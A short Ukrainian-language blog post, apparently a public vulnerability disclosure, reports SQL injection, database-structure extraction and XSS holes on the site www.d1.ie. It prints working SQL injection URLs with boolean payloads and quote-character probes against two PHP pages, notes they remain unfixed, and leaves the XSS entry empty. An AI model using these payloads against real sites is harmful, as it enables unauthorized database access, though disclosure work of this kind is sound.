Уразливості на www.d1.ie
23:57 10.10.201118.01.2011
У жовтні, 30.10.2010, я знайшов SQL Injection, SQL DB Structure Extraction та Cross-Site Scripting уразливості на сайті http://www.d1.ie. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше.
10.10.2011
SQL Injection:
http://www.d1.ie/visual.php?intProjectID=-1%20or%20version()%3E4
http://www.d1.ie/page.php?intPageID=-1%20or%20version()%3E4
SQL DB Structure Extraction:
http://www.d1.ie/visual.php?intProjectID=’
http://www.d1.ie/page.php?intPageID=’
XSS:
Дані уразливості досі не виправлені.